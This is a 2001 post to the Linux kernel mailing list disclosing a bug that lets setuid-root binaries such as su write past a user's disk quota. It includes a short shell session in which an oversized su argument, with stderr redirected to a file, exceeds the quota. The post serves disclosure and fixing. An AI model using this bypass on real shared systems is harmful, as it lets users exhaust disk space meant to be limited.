Overriding qouta limits in Linux kernel

=?ISO-8859-2?Q?Wojciech_Purczy=F1ski?= (wp@supermedia.pl)
Mon, 22 Oct 2001 10:43:13 +0200 (CEST)


Almost any suid binary may be used to create large files overriding quota
limits.

When setuid-root binary inherits file descriptors from user process it may
write to it without respecting the quota restrictions. This is because
suid process has CAP_SYS_RESOURCE effective capability enabled during
writing to the file. Quota does not know anything about who opened file
descriptor and checks current process privileges only. This is bug in
kernel and not in those setuid-root binaries.

Tested on Linux kernel 2.2.19.

Example:

cliph$quota -u wp
Disk quotas for user wp (uid 500):
Filesystem blocks quota limit files quota limit
/dev/hda6 4 10 10 1 10 10

cliph$perl -e 'print "a"x16384' >>myfile
/vol1: write failed, user disk limit reached.

cliph$ls -l myfile
-rw-rw-r-- 1 wp wp 4096 Oct 22 10:33 myfile

cliph$su $(perl -e 'print "a"x16384') 2>>myfile
cliph$ # ^^^ this is it: su writes error message to fd 2 without limits

cliph$ls -l myfile
-rw-rw-r-- 1 wp wp 20505 Oct 22 10:34 myfile

cliph$quota -u wp
Disk quotas for user wp (uid 500):
Filesystem blocks quota limit files quota limit
/dev/hda6 28* 10 10 2 10 10

(I removed `grace' fields from quota output)

PS: Please include my address in CC as I may be not subscribed to the
list(s).

_________________________________________________________________
Wojciech Purczyński | Security Officer | http://cliph.linux.pl/
-----------------------------------------------------------------
Murphy's law says that there is always one more bug...
...but he forgot to mention whether it is exploitable.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/